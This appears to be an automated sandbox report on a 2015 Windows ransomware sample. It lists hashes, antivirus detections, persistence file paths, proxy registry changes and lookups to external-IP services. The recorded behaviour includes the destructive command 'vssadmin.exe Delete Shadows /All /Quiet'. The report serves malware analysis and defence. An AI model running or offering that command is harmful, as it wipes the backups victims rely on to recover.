Analysis Date: 2015-10-30 07:07:47
MD5: 05d4b5f5d1d644934d789b7f68d4ea12
SHA1: 71e7af40613099d7b83820f2137c4978d89d1be5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 62eae76e7a3f8f0608ada86723a3f3a6 sha1: f7ff744536871c4264ca616b276b904d07e32d6d size: 105984
Section .rdata: md5: c71bb52f20b2ea55de8f347467be7052 sha1: e52bf98ab7297be7d6d34a3369f3c014f8d38370 size: 40448
Section .data: md5: 6b8e71bd0e88577b56ff65124f7c861f sha1: 241239757e753af9d7e73219094703a1c29ed50b size: 36352
Section .rsrc: md5: 383feebc8fd8b20a8b5df3bff00bcd41 sha1: 4054d22b3c720e37e03f5847c60cd64c721f81c7 size: 116224
Timestamp: 2015-10-20 09:52:21
Packer: Microsoft Visual C++ ?.?
PEhash: d9a32b9f186b9ca6bd2ab590fb9779c55bf4230b
IMPhash: 61169341108e3c5723f9c4f3b06bf2e9
AV CA (E-Trust Ino): no_virus
AV F-Secure: Trojan.GenericKD.2811394
AV Dr. Web: Trojan.DownLoad3.35944
AV ClamAV: no_virus
AV Arcabit (arcavir): Trojan.GenericKD.2811394
AV BullGuard: Trojan.GenericKD.2811394
AV Padvish: no_virus
AV VirusBlokAda (vba32): Backdoor.Androm
AV CAT (quickheal): no_virus
AV Trend Micro: no_virus
AV Kaspersky: Trojan-Ransom.Win32.Cryptodef.aahc
AV Zillya!: no_virus
AV Emsisoft: Trojan.GenericKD.2811394
AV Ikarus: Trojan.Win32.Crypt
AV Frisk (f-prot): no_virus
AV Authentium: W32/Agent.XL.gen!Eldorado
AV MalwareBytes: Ransom.CryptoWall
AV MicroWorld (escan): Trojan.GenericKD.2811394
AV Microsoft Security Essentials: VirTool:Win32/CeeInject.LJ
AV K7: Trojan ( 004cef571 )
AV BitDefender: Trojan.GenericKD.2811394
AV Fortinet: W32/Kryptik.EASA!tr
AV Symantec: no_virus
AV Grisoft (avg): Crypt_r.AFK
AV Eset (nod32): Win32/Injector.BNHS
AV Alwil (avast): Androp [Drp]
AV Ad-Aware: Trojan.GenericKD.2811394
AV Rising: no_virus
AV Twister: no_virus
AV Avira (antivir): TR/Crypt.ZPACK.196051
AV Mcafee: Gamarue-FDC!05D4B5F5D1D6

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: -k netsvcs
Creates Process: vssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

HTTP GET: http://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
